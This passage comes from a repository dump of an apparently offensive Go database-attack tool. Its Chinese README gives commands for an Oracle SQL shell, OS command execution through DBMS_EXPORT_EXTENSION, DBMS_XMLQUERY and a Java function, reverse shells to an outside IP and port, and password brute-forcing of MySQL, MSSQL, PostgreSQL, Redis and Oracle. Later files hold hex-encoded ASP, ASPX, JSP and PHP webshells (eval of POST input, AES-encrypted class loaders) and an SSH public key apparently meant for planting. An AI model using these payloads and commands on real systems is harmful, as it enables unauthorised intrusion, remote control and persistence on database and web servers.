170 | 使用之前需要安装oracle客户端
171 | Windows下安装方法
172 | 解压下载的instantclient_21_8压缩包，将解压路径添加到系统变量path
173 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673773289868-162dccdc-7921-411e-af11-64544ccbef02.png#averageHue=%23f4f3f3&clientId=u5d6a75f5-9ab0-4&from=paste&height=517&id=u5303451a&name=image.png&originHeight=775&originWidth=805&originalType=binary&ratio=1&rotation=0&showTitle=false&size=43600&status=done&style=none&taskId=u2f1ad378-696d-4c46-8e50-b6e9c1fd3ec&title=&width=536.6666666666666)
174 | Linux下正常支持Redis、Mysql、SQL Server、Postgresql，如想使用Oracle功能需要安装Oracle客户端驱动。在Kali下所有功能可完美运行
175 | ### 获取sql shell
176 | ```shell
177 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser test -pwd "1qaz@WSX" -sid helowin -cli
178 | ```
179 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673429766059-8e2694dc-45e6-4831-bf09-46e47c1fde9e.png#averageHue=%232d2c2c&clientId=uc11344e2-a856-4&from=paste&height=244&id=u40101f1d&name=image.png&originHeight=366&originWidth=2338&originalType=binary&ratio=1&rotation=0&showTitle=false&size=87190&status=done&style=none&taskId=u7a07727f-1939-468d-944c-6c7385e2735&title=&width=1558.6666666666667)
180 | ### DBMS_Export_Extention循环执行命令
181 | ```shell
182 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -console
183 | ```
184 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623715612-8428c8a4-9c1a-4efe-be9a-cafe5f1fd94d.png#averageHue=%232c2c2b&clientId=ucbc34b69-4b9d-4&from=paste&height=331&id=u80060969&name=image.png&originHeight=496&originWidth=2300&originalType=binary&ratio=1&rotation=0&showTitle=false&size=91240&status=done&style=none&taskId=u687dcb39-23a8-4567-af69-305fdd630e8&title=&width=1533.3333333333333)
185 | ### DBMS_Export_Extention执行单条命令
186 | ```shell
187 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dee -docmd -cmd "whoami"
188 | ```
189 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623778177-7653f045-c758-4026-a40a-092c35df1d8a.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=192&id=u98a61877&name=image.png&originHeight=288&originWidth=2351&originalType=binary&ratio=1&rotation=0&showTitle=false&size=70891&status=done&style=none&taskId=uf0fb5e73-b82c-4db2-8bd3-d6425c7bf2c&title=&width=1567.3333333333333)
190 | ### DBMS_Export_Extention反弹shell
191 | ```shell
192 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -dee -re
193 | ```
194 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623842582-d0b94370-e3b0-49fa-ba62-47f8eb4d580e.png#averageHue=%232d2d2c&clientId=ucbc34b69-4b9d-4&from=paste&height=145&id=u7b0096c1&name=image.png&originHeight=218&originWidth=2245&originalType=binary&ratio=1&rotation=0&showTitle=false&size=62363&status=done&style=none&taskId=u9f895e81-de70-4f46-bec8-4efd8325a67&title=&width=1496.6666666666667)
195 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623859445-d8046463-699e-4655-89fe-995233d94ecc.png#averageHue=%231c3345&clientId=ucbc34b69-4b9d-4&from=paste&height=121&id=uc775ec0e&name=image.png&originHeight=181&originWidth=912&originalType=binary&ratio=1&rotation=0&showTitle=false&size=153479&status=done&style=none&taskId=ubcddcba3-563a-417f-9bad-cdf5d097250&title=&width=608)
196 | ### DBMS_XMLQUERY循环执行系统命令
197 | ```shell
198 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -console
199 | ```
200 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673623939528-8eba3e38-34b9-4e52-8799-bb3d1509fa5e.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=359&id=u95d5e0ce&name=image.png&originHeight=539&originWidth=2247&originalType=binary&ratio=1&rotation=0&showTitle=false&size=112317&status=done&style=none&taskId=u5f887f71-3333-4988-8d50-67663f3ba69&title=&width=1498)
201 | ### DBMS_XMLQUERY执行单条系统命令
202 | ```shell
203 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -dx -docmd -cmd "whoami"
204 | ```
205 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624066692-d9d54ab0-7d3b-46c1-9a23-5456373d928d.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=244&id=ud170fc40&name=image.png&originHeight=366&originWidth=2351&originalType=binary&ratio=1&rotation=0&showTitle=false&size=88999&status=done&style=none&taskId=u4e1a65c9-08aa-4c34-883f-4af769e6da2&title=&width=1567.3333333333333)
206 | ### 卸载命令执行函数
207 | ```shell
208 | go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -del
209 | ```
210 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624027931-10678763-bf42-472a-a91d-e640b3c1555f.png#averageHue=%232d2c2c&clientId=ucbc34b69-4b9d-4&from=paste&height=185&id=u230a0fb8&name=image.png&originHeight=277&originWidth=2261&originalType=binary&ratio=1&rotation=0&showTitle=false&size=68992&status=done&style=none&taskId=u517c2117-9036-4b39-a465-b569c694f44&title=&width=1507.3333333333333)
211 | ### **dbms_java_test.funcall反弹shell**
212 | ```shell
213 |  go run .\main.go -oracle -rhost 192.168.111.139 -rport 1521 -ruser system -pwd "1qaz@WSX" -sid lhr10g -lhost 175.178.233.198 -lport 7776 -fc 
214 | ```
215 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624130369-ef91ff5e-7b6d-426d-9a4d-a195c4da0a32.png#averageHue=%232d2d2c&clientId=ucbc34b69-4b9d-4&from=paste&height=203&id=u7976a237&name=image.png&originHeight=304&originWidth=2287&originalType=binary&ratio=1&rotation=0&showTitle=false&size=88970&status=done&style=none&taskId=u8c491d7c-1038-46ac-b415-fbf388a9431&title=&width=1524.6666666666667)
216 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1673624155908-1da47b35-40eb-4b39-abc6-0aead14e962b.png#averageHue=%231e3648&clientId=ucbc34b69-4b9d-4&from=paste&height=117&id=uae5a3a14&name=image.png&originHeight=176&originWidth=1204&originalType=binary&ratio=1&rotation=0&showTitle=false&size=188379&status=done&style=none&taskId=ua91bf8ed-063e-4f7f-8ebd-1222742f0ae&title=&width=802.6666666666666)
217 | ## 爆破数据库账号密码
218 | ### Mysql
219 | ```
220 | go run .\main.go -rhost 192.168.111.206 -rport 3306 -crack -m mysql
221 | ```
222 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675176813163-edc698cf-4d8d-4ecd-b459-e6c3951d08a2.png#averageHue=%232d2c2c&clientId=uf3dc0733-6a37-4&from=paste&height=153&id=u8d9a68c6&name=image.png&originHeight=230&originWidth=1665&originalType=binary&ratio=1&rotation=0&showTitle=false&size=51404&status=done&style=none&taskId=ud314a94b-753a-4325-bc31-c21e484e977&title=&width=1110)
223 | ### MSSQL
224 | ```shell
225 | go run .\main.go -rhost 192.168.111.223 -rport 1433 -crack -m mssql
226 | ```
227 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183775890-0845515d-5a4c-475c-a28f-6e9bb6ea385e.png#averageHue=%232c2c2b&clientId=uf3dc0733-6a37-4&from=paste&height=483&id=u6fe135f5&name=image.png&originHeight=725&originWidth=1634&originalType=binary&ratio=1&rotation=0&showTitle=false&size=141874&status=done&style=none&taskId=u0c8a6358-73a1-4a28-bf17-88a87d4b93f&title=&width=1089.3333333333333)
228 | ### Postgresql
229 | ```shell
230 | go run .\main.go -rhost 192.168.111.211 -rport 5432 -crack -m postgresql
231 | ```
232 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183814719-c9714b53-1246-46f7-badd-da2ab5a4a829.png#averageHue=%232d2c2c&clientId=uf3dc0733-6a37-4&from=paste&height=751&id=u2a5aedcc&name=image.png&originHeight=1126&originWidth=1606&originalType=binary&ratio=1&rotation=0&showTitle=false&size=264923&status=done&style=none&taskId=u52ab6436-8908-4822-b0fd-ebc06ed4f59&title=&width=1070.6666666666667)
233 | ### Redis
234 | ```shell
235 | go run .\main.go -rhost 192.168.111.211 -rport 6379 -crack -m redis
236 | ```
237 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183848971-060694b2-5666-436a-abd8-738254a1ba1e.png#averageHue=%232f2e2d&clientId=uf3dc0733-6a37-4&from=paste&height=49&id=u86edd1aa&name=image.png&originHeight=74&originWidth=1538&originalType=binary&ratio=1&rotation=0&showTitle=false&size=23762&status=done&style=none&taskId=ubc61896d-0d4f-46f8-bfb9-bc38cb89d95&title=&width=1025.3333333333333)
238 | ### Oracle
239 | ```shell
240 | go run .\main.go -rhost 192.168.111.211 -rport 1521 -crack -m oracle
241 | ```
242 | ![image.png](https://cdn.nlark.com/yuque/0/2023/png/22017589/1675183934258-2ace77e2-b03f-4f51-8bb4-ab63ffb85793.png#averageHue=%232d2c2c&clientId=uf3dc0733-6a37-4&from=paste&height=209&id=ud7226210&name=image.png&originHeight=314&originWidth=2233&originalType=binary&ratio=1&rotation=0&showTitle=false&size=83538&status=done&style=none&taskId=u42e7626e-4bf4-40b8-8f42-895a951d6ac&title=&width=1488.6666666666667)
243 | 


--------------------------------------------------------------------------------
/shell.txt:
--------------------------------------------------------------------------------
1 | <?php phpinfo();?>


--------------------------------------------------------------------------------
/shell/shell.asp:
--------------------------------------------------------------------------------
1 | 0x3c2520526573706f6e73652e43686172536574203d20225554462d3822200a6b3d2265343565333239666562356439323562220a53657373696f6e28226b22293d6b0a73697a653d526571756573742e546f74616c42797465730a636f6e74656e743d526571756573742e42696e617279526561642873697a65290a466f7220693d3120546f2073697a650a726573756c743d726573756c74264368722861736362286d69646228636f6e74656e742c692c31292920586f7220417363284d6964286b2c286920616e64203135292b312c312929290a4e6578740a6578656375746528726573756c74290a253e


--------------------------------------------------------------------------------
/shell/shell.aspx:
--------------------------------------------------------------------------------
1 | 0x3c25402050616765204c616e67756167653d2243232220253e3c2540496d706f7274204e616d6573706163653d2253797374656d2e5265666c656374696f6e22253e3c2553657373696f6e2e41646428226b222c226534356533323966656235643932356222293b627974655b5d206b203d20456e636f64696e672e44656661756c742e47657442797465732853657373696f6e5b305d202b202222292c63203d20526571756573742e42696e6172795265616428526571756573742e436f6e74656e744c656e677468293b417373656d626c792e4c6f6164286e65772053797374656d2e53656375726974792e43727970746f6772617068792e52696a6e6461656c4d616e6167656428292e437265617465446563727970746f72286b2c206b292e5472616e73666f726d46696e616c426c6f636b28632c20302c20632e4c656e67746829292e437265617465496e7374616e636528225522292e457175616c732874686973293b253e


--------------------------------------------------------------------------------
/shell/shell.jsp:
--------------------------------------------------------------------------------
1 | 0x3c25407061676520696d706f72743d226a6176612e7574696c2e2a2c6a617661782e63727970746f2e2a2c6a617661782e63727970746f2e737065632e2a22253e3c2521636c617373205520657874656e647320436c6173734c6f616465727b5528436c6173734c6f616465722063297b73757065722863293b7d7075626c696320436c61737320672862797465205b5d62297b72657475726e2073757065722e646566696e65436c61737328622c302c622e6c656e677468293b7d7d253e3c2569662028726571756573742e6765744d6574686f6428292e657175616c732822504f53542229297b537472696e67206b3d2265343565333239666562356439323562223b73657373696f6e2e70757456616c7565282275222c6b293b43697068657220633d4369706865722e676574496e7374616e6365282241455322293b632e696e697428322c6e6577205365637265744b657953706563286b2e676574427974657328292c224145532229293b6e6577205528746869732e676574436c61737328292e676574436c6173734c6f616465722829292e6728632e646f46696e616c286e65772073756e2e6d6973632e4241534536344465636f64657228292e6465636f646542756666657228726571756573742e67657452656164657228292e726561644c696e6528292929292e6e6577496e7374616e636528292e657175616c732870616765436f6e74657874293b7d253e


--------------------------------------------------------------------------------
/shell/shell.php:
--------------------------------------------------------------------------------
1 | 0x3c3f70687020406576616c28245f504f53545b785d293b3f3e


--------------------------------------------------------------------------------
/ssh.txt:
--------------------------------------------------------------------------------
1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDINXK+mL26T6i5GG9WN7gNZ0CP241+R2Tb3kY+tzpdLovd9GoOkadd16ruNjE5cXOWrSdN9l/Md7ylP00md9lWKFC15Zf7TfkIXtsYg/9fIV1+1YmyUYhbSTNAp3GGYHQxM/YUdnvUW1F1btRemE5VRjEdK/pC+5Q81vCLmzKdQKe4ksVS5rI0iz2pDDZmO
2 | fa3OROAfXrbm79yn45mODPxUoePsy2XbacNQ3gINqvRkQyXUovYoK4wyxUFkBD6Fu+YpYTJhb4sDayomCApxgPHfWU2B2bMkT5evYsptNFC9P4EUzc7n04IQIN4Vja/OL/ICVBj9OgqGKX10p2QG6Krq1Z/He3mOcnFGv/HuyncARoftYxAP+6682U+t9OMVayPTqgE/TbenTh0gkZwO4xZW8BQJDxp0CRqCm
3 | AKviOaEN+nPAq+H5g51Nf9SCGjb+lwFOKVRtaowFtSPLWLkomniRSuehSr+g71kvAap9YkNTqKYvltBKMtGt9AzJtRj5TuTQ/2ZJ7Gjwh7GDRYoTKgnzQIF/iOd/xtXvHtHiumPK91nmazlhmgAvcFofxsMcHfV09rRqlSm58+OgMC4lV+mBOeC8eIaa4PhKccl3cG9vLR3lSg9V/0sUqTEqXp5zewvCno8Wq
4 | NdC0sG+rb3AwY2ozrZx+N1TyiIz9nDaVooQ== root@VM-20-3-ubuntu


--------------------------------------------------------------------------------